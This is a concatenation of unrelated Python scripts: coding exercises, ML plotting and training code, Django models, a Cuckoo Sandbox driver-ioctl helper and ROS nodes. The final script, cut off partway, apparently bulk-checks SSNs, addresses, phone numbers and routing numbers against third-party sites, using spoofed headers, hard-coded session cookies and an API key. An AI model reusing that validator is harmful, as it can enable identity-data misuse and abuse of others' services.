# Ask the user to enter a number between 10 and 20 (inclusive). If they enter a number within
# this range, display the message “Thank you”, otherwise display the message “Incorrect answer”.
"""
number = float(input("Enter a number between 10 to 20: "))
if number >= 10 and number <= 20:
print("Thank you")
else:
print("Incorrect answer")
"""
|
import matplotlib
matplotlib.use('Agg')
import numpy as np
from sklearn import metrics
import argparse
import matplotlib.pyplot as plt
from os import path, makedirs
def get_roc(authentic_file, impostor_file):
    """Load authentic/impostor score files and return sklearn's
    (fpr, tpr, thresholds) ROC triple.

    Each file is either a single column of scores, or a multi-column
    whitespace table with the score in column index 2.
    """
    # dtype=str: np.str was merely an alias for the builtin and was
    # removed from NumPy (deprecated 1.20, removed 1.24).
    authentic_score = np.loadtxt(authentic_file, dtype=str)
    if np.ndim(authentic_score) == 1:
        authentic_score = authentic_score.astype(float)
    else:
        authentic_score = authentic_score[:, 2].astype(float)
    authentic_y = np.ones(authentic_score.shape[0])
    impostor_score = np.loadtxt(impostor_file, dtype=str)
    if np.ndim(impostor_score) == 1:
        impostor_score = impostor_score.astype(float)
    else:
        impostor_score = impostor_score[:, 2].astype(float)
    impostor_y = np.zeros(impostor_score.shape[0])
    # Authentic pairs are the positive class (label 1).
    y = np.concatenate([authentic_y, impostor_y])
    scores = np.concatenate([authentic_score, impostor_score])
    return metrics.roc_curve(y, scores, drop_intermediate=True)
def compute_roc(authentic_file, impostor_file):
    """Compute ROC curves for the 5th-percentile, median and 95th-percentile
    score files and return them as three parallel lists (fprs, tprs, thrs)."""
    fprs, tprs, thrs = [], [], []
    for suffix in ('_auc_5.txt', '_auc_median.txt', '_auc_95.txt'):
        fpr, tpr, thr = get_roc(authentic_file + suffix, impostor_file + suffix)
        fprs.append(fpr)
        tprs.append(tpr)
        thrs.append(thr)
    return fprs, tprs, thrs
def plot(title, fpr1, tpr1, thr1, l1, fpr2, tpr2, thr2, l2,
         fpr3, tpr3, thr3, l3, fpr4, tpr4, thr4, l4):
    """Draw up to four ROC bands on a log-x axis.

    Each fprN/tprN is a [5th, median, 95th percentile] triple of curves
    (see compute_roc): the median is drawn as a line and the 5-95 range
    as a filled band. Series 2-4 are skipped when their label is None;
    NOTE(review): series 1 is always drawn, and `title`/thrN parameters
    are currently unused.
    """
    plt.rcParams["figure.figsize"] = [6, 4.5]
    plt.rcParams['font.size'] = 12
    plt.grid(True, zorder=0, linestyle='dashed')
    plt.gca().set_xscale('log')
    begin_x = 1e-5
    end_x = 1e0
    print(begin_x, end_x)
    plt.plot(fpr1[1], tpr1[1], 'C1', label=l1)
    # plt.plot(fpr1[2], tpr1[2], 'C1')
    plt.fill(np.append(fpr1[0], fpr1[2][::-1]), np.append(tpr1[0], tpr1[2][::-1]), facecolor='C1', alpha=0.5)
    if l2 is not None:
        plt.plot(fpr2[1], tpr2[1], 'C0', label=l2)
        # plt.plot(fpr2[2], tpr2[2], 'C0')
        plt.fill(np.append(fpr2[0], fpr2[2][::-1]), np.append(tpr2[0], tpr2[2][::-1]), facecolor='C0', alpha=0.5)
    if l3 is not None:
        plt.plot(fpr3[1], tpr3[1], 'C3', label=l3)
        # plt.plot(fpr3[2], tpr3[2], 'C3')
        plt.fill(np.append(fpr3[0], fpr3[2][::-1]), np.append(tpr3[0], tpr3[2][::-1]), facecolor='C3', alpha=0.5)
    if l4 is not None:
        plt.plot(fpr4[1], tpr4[1], 'C4', label=l4)
        plt.fill(np.append(fpr4[0], fpr4[2][::-1]), np.append(tpr4[0], tpr4[2][::-1]), facecolor='C4', alpha=0.5)
    plt.legend(loc='lower right', fontsize=12)
    plt.xlim([begin_x, end_x])
    # plt.xlim([0, 1])
    # plt.ylim([0, 1])
    plt.ylim([0.7, 1])
    plt.ylabel('True Positive Rate')
    plt.xlabel('False Match Rate')
    plt.tight_layout(pad=0)
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Plot ROC Curve')
    # Up to four (authentic, impostor, label) triples; only the first is required.
    parser.add_argument('-authentic1', '-a1', help='Authentic scores 1.')
    parser.add_argument('-impostor1', '-i1', help='Impostor scores 1.')
    parser.add_argument('-label1', '-l1', help='Label 1.')
    parser.add_argument('-authentic2', '-a2', help='Authentic scores 2.')
    parser.add_argument('-impostor2', '-i2', help='Impostor scores 2.')
    parser.add_argument('-label2', '-l2', help='Label 2.')
    parser.add_argument('-authentic3', '-a3', help='Authentic scores 3.')
    parser.add_argument('-impostor3', '-i3', help='Impostor scores 3.')
    parser.add_argument('-label3', '-l3', help='Label 3.')
    parser.add_argument('-authentic4', '-a4', help='Authentic scores 4.')
    parser.add_argument('-impostor4', '-i4', help='Impostor scores 4.')
    parser.add_argument('-label4', '-l4', help='Label 4.')
    parser.add_argument('-title', '-t', help='Plot title.')
    parser.add_argument('-dest', '-d', help='Folder to save the plot.')
    parser.add_argument('-name', '-n', help='Plot name (without extension).')
    args = parser.parse_args()
    # Optional series default to None triples so plot() can skip them.
    fpr2, tpr2, thr2 = (None, None, None)
    fpr3, tpr3, thr3 = (None, None, None)
    fpr4, tpr4, thr4 = (None, None, None)
    fpr1, tpr1, thr1 = compute_roc(args.authentic1, args.impostor1)
    if args.authentic2 is not None:
        fpr2, tpr2, thr2 = compute_roc(args.authentic2, args.impostor2)
    if args.authentic3 is not None:
        fpr3, tpr3, thr3 = compute_roc(args.authentic3, args.impostor3)
    if args.authentic4 is not None:
        fpr4, tpr4, thr4 = compute_roc(args.authentic4, args.impostor4)
    plot(args.title, fpr1, tpr1, thr1, args.label1,
         fpr2, tpr2, thr2, args.label2, fpr3, tpr3, thr3, args.label3,
         fpr4, tpr4, thr4, args.label4)
    # Create the destination folder on demand, then save at 150 dpi.
    if not path.exists(args.dest):
        makedirs(args.dest)
    plot_path = path.join(args.dest, args.name + '.png')
    plt.savefig(plot_path, dpi=150)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from django.urls import reverse
# Create your models here.
class Asteroide(models.Model):
    """Near-Earth asteroid record (field names are Spanish).

    NOTE(review): the data source is not visible here — presumably an
    asteroid API feed; confirm against the view/ingest code.
    """
    nombre = models.CharField(max_length=200)        # name
    diametro_min = models.CharField(max_length=200)  # minimum estimated diameter
    diametro_max = models.CharField(max_length=200)  # maximum estimated diameter
    fecha = models.DateField()                       # date
    url = models.URLField()
    is_dangerous = models.BooleanField()
    def get_absolute_url(self):
        """Return the canonical detail-page URL for this asteroid."""
        return reverse('asteroide-detail', kwargs={'pk': self.pk})
# Copyright (C) 2016-2018 Cuckoo Foundation.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
import ctypes
import logging
import socket
import struct
from lib.common.defines import (
KERNEL32, GENERIC_READ, GENERIC_WRITE, FILE_SHARE_READ, FILE_SHARE_WRITE,
OPEN_EXISTING
)
from lib.common.rand import random_string
log = logging.getLogger(__name__)
# Random name for the zer0m0n driver.
driver_name = random_string(16)
CTL_CODE_BASE = 0x222000
class Ioctl(object):
    """Send DeviceIoControl requests to a named kernel device."""
    def __init__(self, pipepath):
        # Device name (without the \\.\ prefix) to open.
        self.pipepath = pipepath
    def invoke(self, ctlcode, value, outlength=0x1000):
        """Issue one ioctl; return the raw output bytes, or False on error."""
        # ctypes may return the handle as a signed int; % 2**32 normalises
        # it so INVALID_HANDLE_VALUE compares equal to 0xffffffff.
        device_handle = KERNEL32.CreateFileA(
            "\\\\.\\%s" % self.pipepath, GENERIC_READ | GENERIC_WRITE,
            FILE_SHARE_READ | FILE_SHARE_WRITE, None, OPEN_EXISTING, 0, None
        ) % 2**32
        if device_handle == 0xffffffff:
            # Only report an error if the error is not "name not found",
            # indicating that no kernel analysis is currently taking place.
            if KERNEL32.GetLastError() != 2:
                log.warning(
                    "Error opening handle to driver (%s): %d!",
                    driver_name, KERNEL32.GetLastError()
                )
            return False
        out = ctypes.create_string_buffer(outlength)
        length = ctypes.c_uint()
        ret = KERNEL32.DeviceIoControl(
            device_handle, ctlcode, value, len(value), out,
            ctypes.sizeof(out), ctypes.byref(length), None
        )
        KERNEL32.CloseHandle(device_handle)
        if not ret:
            log.warning(
                "Error performing ioctl (0x%08x): %d!",
                ctlcode, KERNEL32.GetLastError()
            )
            return False
        # Trim to the number of bytes the driver actually wrote.
        return out.raw[:length.value]
class Zer0m0nIoctl(Ioctl):
    """Typed helpers for the zer0m0n driver's ioctls.

    Each action's ioctl code is CTL_CODE_BASE + 4 * its index in
    `actions`, so this list's order is part of the driver ABI.
    """
    actions = [
        "addpid",
        "cmdpipe",
        "channel",
        "dumpmem",
        "yarald",
        "getpids",
        "hidepid",
        "dumpint",
        "resultserver",
    ]
    def invoke(self, action, buf):
        # Translate the symbolic action name into its ioctl code.
        if action not in self.actions:
            raise RuntimeError("Invalid ioctl action: %s" % action)
        return Ioctl.invoke(
            self, CTL_CODE_BASE + self.actions.index(action) * 4, buf,
        )
    def addpid(self, pid):
        # Ask the driver to monitor process `pid` (64-bit LE).
        return self.invoke("addpid", struct.pack("Q", pid))
    def cmdpipe(self, pipe):
        # "\x00".join(...) interleaves NUL bytes between the characters,
        # a crude UTF-16-LE-style encoding of the pipe name.
        return self.invoke("cmdpipe", "\x00".join(pipe + "\x00"))
    def channel(self, pipe):
        return self.invoke("channel", "\x00".join(pipe + "\x00"))
    def dumpmem(self, pid):
        # Request a memory dump of process `pid`.
        return self.invoke("dumpmem", struct.pack("Q", pid))
    def yarald(self, rulepath):
        # Upload a compiled yara rules file to the driver.
        return self.invoke("yarald", open(rulepath, "rb").read())
    def getpids(self):
        # NOTE(review): len(pids)/8 is a float on Python 3 — this module
        # is Python 2 code (struct repeat counts must be integers).
        pids = self.invoke("getpids", "pids") or ""
        return struct.unpack("Q"*(len(pids)/8), pids)
    def hidepid(self, pid):
        return self.invoke("hidepid", struct.pack("Q", pid))
    def dumpint(self, ms):
        # Set the periodic memory-dump interval, in milliseconds.
        return self.invoke("dumpint", struct.pack("I", ms))
    def resultserver(self, ip, port):
        # Just a regular SOCKADDR structure, up to 128 bytes
        if ":" in ip:
            rs = struct.pack("<H", socket.AF_INET6)
            rs += struct.pack("!H", port)
            rs += socket.inet_pton(socket.AF_INET6, ip)
        else:
            rs = struct.pack("<H", socket.AF_INET)
            rs += struct.pack("!H", port)
            rs += socket.inet_aton(ip)
        return self.invoke("resultserver", rs)
# Module-level singleton bound to the randomly named driver device.
zer0m0n = Zer0m0nIoctl(driver_name)
|
from django.contrib import admin
from ebooks.models import Ebook, Review
# Expose the Ebook and Review models in the default Django admin site.
admin.site.register(Ebook)
admin.site.register(Review)
|
# Python program to check whether the entered number is a palindrome.
# Solution:
inp = input("Enter the number to check:")
def check_palindrone(text):
    """Return True if *text* reads the same forwards and backwards."""
    # Compare with the reversed string instead of pairwise indexing; this
    # also stops shadowing the builtin `str`, as the original parameter did.
    return text == text[::-1]
# Report the result (output strings kept exactly as in the original).
result = check_palindrone(inp)
if (result):
    print("Yes,",inp,"is palindrone.")
else:
    print("No,",inp,"is not palindrone.")
'''Output:
Enter the number to check:12321
Yes, 12321 is palindrone.
Process finished with exit code 0
''' |
# -*- coding=utf-8 -*-
# @Time: 2020/10/13 2:45 PM
# Author: Wang Wenna
# @File: 五感图.py ("five senses chart")
# @Software: PyCharm
from lxml import etree
# NOTE(review): `html` is not defined in this snippet — presumably the page
# source fetched elsewhere; the XPath expression is an empty placeholder.
parse_html=etree.HTML(html)
r_list=parse_html.xpath('')
|
#!/usr/bin/env python
'''
**********************************************************************
* Filename : CreateLogFile.py
* Description : Takes an image from the camera and an angle from the servo
* and writes them to a CSV file
* Author : Joe Kocsis
* E-mail : Joe.Kocsis3@gmail.com
* Website : www.github.com/jkocsis3/tanis
**********************************************************************
'''
import rospy
from sensor_msgs.msg import Image
from cv_bridge import CvBridge
import cv2
import os
from angela.msg import steermsg
class CreateLogFile(object):
    """ROS node that pairs camera frames with steering angles and logs
    them (one .jpg per frame plus a CSV row) as training data."""
    _DEBUG = True
    _DEBUG_INFO = 'DEBUG "CreateLogFile.py":'
    def __init__(self, debug=False):
        self._DEBUG = debug
        rospy.loginfo(self._DEBUG_INFO + "Initiating Node")
        rospy.init_node("Collate_Training_Data")
        self.bridge = CvBridge()
        self.counter = 0       # sequence number, doubles as the image filename
        self.currentImage = 0  # latest frame (cv2 image once received)
        self.currentAngle = 0  # latest steering angle
        self.savePath = os.path.join('/home/pi/tanis/Images/')
        # Append mode: repeated runs keep extending the same CSV.
        self.file = open(self.savePath + 'data.csv', 'a')
        self.image_sub = rospy.Subscriber("/angela/cameras/main/capture", Image, self.SetImage)
        self.speed_sub = rospy.Subscriber('/angela/steer/setAngle', steermsg, self.SetAngle)
        # stops the node from exiting
        rospy.spin()
        self.file.close()
    # Whenever an image message is recieved, set the incoming image to the current image.
    def SetImage(self, data):
        """Image callback: convert the ROS message and log one sample."""
        if self._DEBUG:
            rospy.loginfo("setting image")
        self.currentImage = self.bridge.imgmsg_to_cv2(data, desired_encoding="rgb8")
        self.CollateAndSaveData()
    def SetAngle(self, data):
        """Steering callback: remember the most recent angle."""
        if self._DEBUG:
            rospy.loginfo("setting angle")
        self.currentAngle = data.angle
    def CollateAndSaveData(self):
        """Write <counter>.jpg and append '<counter>, <angle>' to the CSV."""
        if self._DEBUG:
            rospy.loginfo("Saving Data")
        cv2.imwrite(self.savePath + (str(self.counter) + '.jpg'), self.currentImage)
        self.file.write(str(self.counter) + ', ' + str(self.currentAngle) + '\n')
        self.counter += 1
if __name__ == '__main__':
    # The constructor blocks in rospy.spin() until node shutdown.
    CreateLogFile()
|
from collections import MutableMapping
def flatten(d, parent_key='', sep='/'):
    """Flatten a nested mapping into a single-level dict whose keys are
    the original key paths joined with *sep*.

    An empty mapping flattens to {parent_key: ''}.
    """
    result = []
    # .items() works on both Python 2 and 3; the original dict.iteritems()
    # was removed in Python 3. (The file-level import of MutableMapping
    # from `collections` is also py2-era; on py3.3+ it lives in
    # collections.abc — TODO update when the file moves to py3.)
    for k, v in d.items():
        new_key = parent_key + sep + k if parent_key else k
        if isinstance(v, MutableMapping):
            result.extend(flatten(v, new_key, sep=sep).items())
        else:
            result.append((new_key, v))
    return dict(result) or {parent_key: ''}
|
#!/usr/bin/env python
PACKAGE = "hektar"
from dynamic_reconfigure.parameter_generator_catkin import *
# Dynamic-reconfigure parameters for wheel control.
# Arguments: name, type, level, description, default, min, max.
gen = ParameterGenerator()
gen.add("speed", int_t, 0, "wheel speed value", 127, 0, 127)
gen.add("variation_factor", double_t, 0, "scalar multiplier for wheel speed", 1.0, 0.0, 5.0)
gen.add("offset_multiplier", double_t, 0, "scalar multiplier for left wheel offset", 1.0, 0.0, 2.0)
gen.add("offset_addition", int_t, 0, "added value for left wheel offset", 0, -50, 50)
exit(gen.generate(PACKAGE, "hektar", "WheelControl"))
|
def intParaBinario(n):
    """Convert a non-negative integer (or numeric string) to a stack of
    binary digits, least-significant bit first; e.g. 6 -> [0, 1, 1].
    """
    # Accept numeric strings, since callers pass values read from input().
    n = int(n)
    # A plain list serves as the stack. The original referenced an
    # undefined `Stack` class and an undefined `decNumber` variable,
    # and never used its parameter — both NameError bugs.
    remstack = []
    while n > 0:
        remstack.append(n % 2)
        n = n // 2
    return remstack
# Read two space-separated numbers and print their binary-digit stacks.
entrada = input().split(" ")
A = intParaBinario(entrada[0])
B = intParaBinario(entrada[1])
print(A)
print(B)
def remove_duplicates_in_array(array):
    """Yield the elements of *array* in order, skipping repeats."""
    seen = set()
    for item in array:
        if item in seen:
            continue
        seen.add(item)
        yield item
def select_place_from_top_list(top_list, prize):
    """Return the 1-based rank *prize* would take in the descending
    *top_list*, or one past the end when it beats no entry.

    Returns None for an empty top list (as the original did).
    """
    last_rank = len(top_list)
    for rank, score in enumerate(top_list, start=1):
        if prize >= score:
            return rank
        if rank == last_rank:
            return rank + 1
def get_history_successes(top_list, successes_data_team):
    """Return the team's running placement after each prize is added to
    its cumulative total, against the deduplicated top list."""
    unique_top = list(remove_duplicates_in_array(top_list))
    running_total = 0
    placements = []
    for prize in successes_data_team:
        running_total += prize
        placements.append(select_place_from_top_list(unique_top, running_total))
    return placements
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# TODO: Import your modules here
import numpy as np
import random as r
# TODO: Define your functions here (a few are missing)
def linear_values() -> np.ndarray:
    """Return 64 evenly spaced values covering [-1.3, 2.5]."""
    return np.linspace(start=-1.3, stop=2.5, num=64)
def coordinate_conversion(cartesian_coordinates: np.ndarray) -> np.ndarray:
    """Convert (x, y) pairs to (r, theta) polar tuples.

    Note: despite the annotation, a list of tuples is returned — this
    matches the original implementation's behavior.
    """
    return [
        (np.sqrt(x ** 2 + y ** 2), np.arctan2(y, x))
        for x, y in cartesian_coordinates
    ]
def polar(cartesian_coordinates: np.ndarray):
    """Convert (x, y) pairs to (rho, phi) rows, returned as an array of
    shape (1, n, 2) — the extra leading axis matches the original."""
    out = np.zeros([len(cartesian_coordinates), 2])
    for row, (x, y) in enumerate(cartesian_coordinates):
        out[row, 0] = np.sqrt(x ** 2 + y ** 2)
        out[row, 1] = np.arctan2(y, x)
    return np.array([out])
def find_closest_index(values: np.ndarray, number: float) -> int:
    """Return the index of the element of *values* closest to *number*;
    the first occurrence wins on ties."""
    gaps = [abs(v - number) for v in values]
    return gaps.index(min(gaps))
if __name__ == '__main__':
    # TODO: call the functions here (translated from the original French)
    # for value in linear_values():
    #     print(value)
    print(coordinate_conversion([(0,0),(1,1),(2,2),(3,3)]))
    print(polar([(0,0),(1,1),(2,2),(3,3)]))
    #print(find_closest_index([4,1,7,2,3,10,5,9,100,65,56,78],60))
|
# Какие пути соответствуют URI схеме и могут быть использованы в командах shell-клиента HDFS?
file:///
file:///home/user/
/tmp/output.txt
hdfs://hdfs/
|
# Count the even and odd numbers in the list.
l = [1, 2, 3, 4, 5, 6, 78, 9, 10, 12]
# The original `c, d = 0` raised "TypeError: cannot unpack non-iterable
# int"; both counters must be initialised from a pair.
c, d = 0, 0
for x in l:
    if x % 2 == 0:
        c += 1
    else:
        d += 1
print("even numbers are {} and odd numbers are {}".format(c, d))
print(len(l))
|
from QPlayer import QPlayer
from SpindelTable import Table
from Deck import generateDeck
import json
import itertools
import matplotlib.pyplot as plt
import random
# Train the Q-learning solitaire player over 20 sets of N games each,
# saving the Q table and a win-rate plot after every set.
for ThousandGameIter in range(20):
    # Run 100 games
    wonGames = 0
    N = 1000  # games per set
    qPlayer = QPlayer(None, loadFromFile = True, rewardEmpty=True, punishMove=True)
    qPlayer.gambleChance = 1.0
    won = []  # 1/0 per game, for the moving-average plot below
    for i in range(N):
        print("Game: " + str(i) + " Set " + str(ThousandGameIter))
        """
        table = Table(-1)
        deck = generateDeck(True, 'quarter-one-color')
        for randStackNo in (random.randint(0,9) for i in range(13)):
            table.stacks[randStackNo].faceUpCards.append(deck.pop())
        """
        table = Table(1)
        qPlayer.newTable(table)
        # Anneal the exploration chance linearly across the set.
        qPlayer.gambleChance -= 1.0/N
        lastPile = False
        # Game loop
        while True:
            # distribute loop
            n = 0
            while True:
                # Prevent going too many moves
                n += 1
                if n > 1000:
                    break
                # Print every something
                if not n % 1000:
                    pass
                    #print(n)
                possMoves = table.possibleMoves()
                if not possMoves:
                    break
                qPlayer.move()
                #input("Press Enter to continue...")
            if table.isWon():
                break
            # Deal a new pile when available, otherwise the game is over.
            if table.piles:
                table.distribute()
                print("Distributing")
                if not table.piles:
                    lastPile = True
                continue
            break
        if table.isWon():
            wonGames += 1
            print(f" WON ({wonGames} of {i})")
            won.append(1)
        else:
            print(f" lost(won {wonGames} of {i})")
            won.append(0)
    # Save the Q matrix in a json file
    jsonDump = json.dumps(qPlayer.Q)
    f = open("Q.json","w")
    f.write(jsonDump)
    f.close()
    # Make graph over won games
    print(f"Number of won games: {wonGames} out of {N}")
    cumsum = list(itertools.accumulate(won))
    # Moving average over a window of N/10 games.
    movingaverage = [sum(won[n:n+int(N/10)])/int(N/10) for n in range(N-int(N/10))]
    plt.plot(range(int(N/10), N), movingaverage)
    #plt.show()
    plt.savefig(f"out{ThousandGameIter}.png")
|
from math import log
from torch import nn
from yarp.envs.torchgymenv import TorchGymEnv
from yarp.envs.unsupervised_env import UnsupervisedEnv
from yarp.policies.tanhgaussianpolicy import TanhGaussianMLPPolicy
from yarp.networks.valuemlp import SingleHeadQMLP
from yarp.networks.mlp import MLP
from yarp.networks.mlp_discriminator import MLPDiscriminator
from yarp.replaybuffers.unsupervisedreplaybuffer import UnsupervisedReplayBuffer
from yarp.algos.sac import SAC
from yarp.algos.diayn import DIAYN
from yarp.algos.diayn_prior import DIAYNWithPrior
from yarp.experiments.experiment import Experiment
from drivingenvs.vehicles.ackermann import AckermannSteeredVehicle
from drivingenvs.envs.base_driving_env import BaseDrivingEnv
from drivingenvs.envs.driving_env_with_vehicles import DrivingEnvWithVehicles
from drivingenvs.priors.lane_following import LaneFollowing
# --- DIAYN-with-prior experiment on the lane-following driving env ---
contexts = 10   # number of DIAYN skills/contexts
max_steps = 50  # episode length
# Upper bound on the episodic DIAYN reward: -T * log(1/K).
max_rew = -max_steps * log(1/contexts)
print('contexts = {}, max_steps = {}, max_rew = {}'.format(contexts, max_steps, max_rew))
veh = AckermannSteeredVehicle((4, 2))
env = DrivingEnvWithVehicles(veh, distance=200.0, n_lanes = 5, dt=0.2, max_steps = max_steps, start_lane = 2)
env = UnsupervisedEnv(env, context_dim=contexts)
print(env.reset())
prior = LaneFollowing(env.wrapped_env)
policy = TanhGaussianMLPPolicy(env, hiddens = [256, 256], hidden_activation=nn.ReLU)
# Twin Q-networks plus targets, as used by SAC.
qf1 = SingleHeadQMLP(env, hiddens = [256, 256], hidden_activation=nn.ReLU, logscale=False, scale=1.0)
target_qf1 = SingleHeadQMLP(env, hiddens = [256, 256], hidden_activation=nn.ReLU, logscale=False, scale=1.0)
qf2 = SingleHeadQMLP(env, hiddens = [256, 256], hidden_activation=nn.ReLU, logscale=False, scale=1.0)
target_qf2 = SingleHeadQMLP(env, hiddens = [256, 256], hidden_activation=nn.ReLU, logscale=False, scale=1.0)
buf = UnsupervisedReplayBuffer(env, capacity=int(1e6))
# reward_scale=1/max_rew keeps returns roughly in [0, 1].
sac = SAC(env, policy, qf1, target_qf1, qf2, target_qf2, buf, discount = 0.95, reward_scale=1/max_rew, learn_alpha=True, alpha=0.01, steps_per_epoch=1000, qf_itrs=1000, qf_batch_size=256, target_update_tau=0.005, epochs=150)
# Discriminator sees only selected observation indices; TODO confirm what
# observation dimensions [2, 7, 8, 9, 10, 11] correspond to.
disc = MLPDiscriminator(in_idxs=[2, 7, 8, 9, 10, 11], outsize=env.context_dim, hiddens = [300, 300])
print(disc)
diayn = DIAYNWithPrior(env, buf, disc, sac, prior, beta = 0.05)
experiment = Experiment(diayn, 'diayn_lane_follow_beta0.05_disc_v_laneid_traffic', save_every=5, save_logs_every=5)
experiment.run()
|
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
import time
import requests
import json
import sys
sys.path.append("..")
from urllib import parse
import xlrd
from xlutils.copy import copy
import threadpool
import threading
import db
import Chrome_driver
def get_headers():
    """Return (headers, cookies) for requests to ssnregistry.org/validate.

    NOTE(review): the cookie values below are hard-coded session captures;
    as the note in the body says, XSRF-TOKEN and laravel_session expire
    and must be refreshed before use.
    """
    headers = {
        'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
        'accept-encoding': 'gzip, deflate',
        'accept-language': 'en-US,en;q=0.9',
        'cache-control': 'max-age=0',
        'content-length': '61',
        'content-type': 'application/x-www-form-urlencoded',
        'origin': 'https://www.ssnregistry.org',
        'referer': 'https://www.ssnregistry.org/validate',
        'sec-fetch-mode': 'navigate',
        'sec-fetch-site': 'same-origin',
        'sec-fetch-user': '?1',
        'upgrade-insecure-requests': '1',
        'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36'
    }
    '''
    to change
    XSRF-TOKEN
    laravel_session
    '''
    cookies = {
        '__cfduid':'dcb0dbd4e34dbf751bfa5e6d1042292831580802619',
        '_ga':'GA1.2.1459630284.1581131618',
        '_gid':'GA1.2.539623217.1581131620',
        '__gads':'',
        'ID':'3c7df452b92ae7c0',
        'T':'1580802622',
        'S':'ALNI_MYkIzFc-_-4o_7H1PUHcCnX8SNCZA',
        'XSRF-TOKEN':'eyJpdiI6IkRZRkdhVE4wWlkrMUNNckVCY1A4MVE9PSIsInZhbHVlIjoibllLRUdvbTZPVmsxT2VsRVpXNkF0N1R1WU02OU5OSmx1WGQ1UTEyTDlYMWxNMm9tbGhjRTJ5Q3NSQjdzT0Y4OU1abmZQTHZuV1Q3S1VDWVFGXC9zNWRnPT0iLCJtYWMiOiJhYTk4ZjhmMDlhYjc4NTUyZjQwMTZkZDI0NGU4OGQ5NmUxYTEzMzhiZjIyYTMxZTU2ZGE0M2RhMDRkMDAxZGE2In0',
        'laravel_session':'eyJpdiI6IndYd2E2TDMwNUwyQmFCSEV6Q2R3dVE9PSIsInZhbHVlIjoiZEIxbnI3SjVSWmZnSTc2blBkTXBoVVdOaUZDTVBCYmhIa01XTzhnVURiam1GVUhVTVwvOSs3TVpcL1pZMkp1VGkyQUpaRERaWlNiVXVmcVcrRWh4c3NVdz09IiwibWFjIjoiZDVmZGZkZmU1NWM1NmZjMDM0NjI3NzFlOGYyMWYwNmJmY2ExZTEzYzA0YzM5MTMwZmFhNWJkOGUwNzU3NzI5ZiJ9',
    }
    # stick = int(round(time.time() * 1000))
    return headers,cookies
def get_headers2():
    """Return request headers for socialsecurityofficenear.me's SSN
    validator endpoint (no cookies required)."""
    headers = {
        'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
        'accept-encoding': 'gzip, deflate',
        'accept-language': 'en-US,en;q=0.9',
        'cache-control': 'no-cache',
        'content-length': '29',
        'content-type': 'application/x-www-form-urlencoded',
        'origin': 'https://socialsecurityofficenear.me',
        'pragma': 'no-cache',
        'referer': 'https://socialsecurityofficenear.me/social-security-numbers/validator/',
        'sec-fetch-mode': 'navigate',
        'sec-fetch-site': 'same-origin',
        'sec-fetch-user': '?1',
        'upgrade-insecure-requests': '1',
        'user-agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'
    }
    return headers
def validate_address(Address='',ZipCode=''):
    """Check a street address + ZIP against consumerconnecting.com.

    Returns 1 when the service reports StatusCode 200 (valid), 0 when
    not, and -1 when the HTTP request itself fails.
    """
    headers = {
        'Accept': '*/*',
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
        'Origin': 'https://cashrequestonline.com',
        'Referer': 'https://cashrequestonline.com/Home/GetStarted?RequestedAmount=1000&ZipCode=85705',
        'Sec-Fetch-Mode': 'cors',
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36'
    }
    url_ = 'https://www.consumerconnecting.com/LeadProcessing/CheckAddress'
    # Address='P.O Box 434'
    # ZipCode=35068
    # The Referer must carry the ZIP code actually being checked.
    headers['Referer'] = headers['Referer'].replace('85705',str(ZipCode))
    data = {}
    data['Address'] = Address
    data['ZipCode'] = int(ZipCode)
    # print('preparing to add proxy config:',data)
    data_ = parse.urlencode(data)
    s = requests.session()
    try:
        resp = s.post(url_,data=data_,headers=headers)
    except Exception as e:
        print(str(e))
        return -1
    # resp.encoding = 'utf-8'  # set the encoding
    resp.encoding='UTF-8'
    # resp = requests.post(url_,data=data)
    # print(resp.apparent_encoding)
    resp_text = resp.text
    print(resp_text)
    data = json.loads(resp.text)
    flag = 0
    if data['StatusCode'] == 200:
        # print('address alive')
        flag = 1
    else:
        # print('address fake')
        flag = 0
    return flag
def get_first_headers():
    """Headers for the initial page GET (navigation request; no
    content-type/origin fields, sec-fetch-site is 'none')."""
    headers = dict()
    headers['accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3'
    headers['accept-encoding'] = 'gzip, deflate'
    headers['accept-language'] = 'en-US,en;q=0.9'
    headers['cache-control'] = 'no-cache'
    headers['pragma'] = 'no-cache'
    headers['sec-fetch-mode'] = 'navigate'
    headers['sec-fetch-site'] = 'none'
    headers['upgrade-insecure-requests'] = '1'
    headers['user-agent'] = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36'
    return headers
def validate_phone(phone):
    """Validate a US phone number through the apilayer numverify API.

    Returns 1 when the service reports the number valid, 0 when not,
    and -1 if the request or JSON decode fails.
    """
    # phone = 2489710778
    url = 'http://apilayer.net/api/validate?access_key=1bb8e33a938a9bb0a25b904d51775710&number=%d&country_code=US&format=1'%int(phone)
    try:
        data = json.loads(requests.get(url).text)
    except:
        return -1
    # print(resp.text)
    return 1 if data['valid'] == True else 0
def validate_routing(routing):
    """Validate a bank routing (ABA) number via the consumerconnecting.com
    JSONP endpoint.

    Returns:
        1  -- Result == 1 (routing number valid)
        0  -- Result == 4 (invalid) or any other Result value
        -1 -- the HTTP GET raised an exception
    """
    # routing = 421051540
    url = 'http://www.consumerconnecting.com/misc/?responsetype=json&action=validatebankaba&bankaba=%d&uts=1582817828788&uid=d127367d-6053-4c65-b60b-fb53d7008f10&callback=jQuery2230839557435128814_1582817474953&_=1582817474957'%int(routing)
    try:
        resp = requests.get(url)
        # data = json.loads(resp.text)
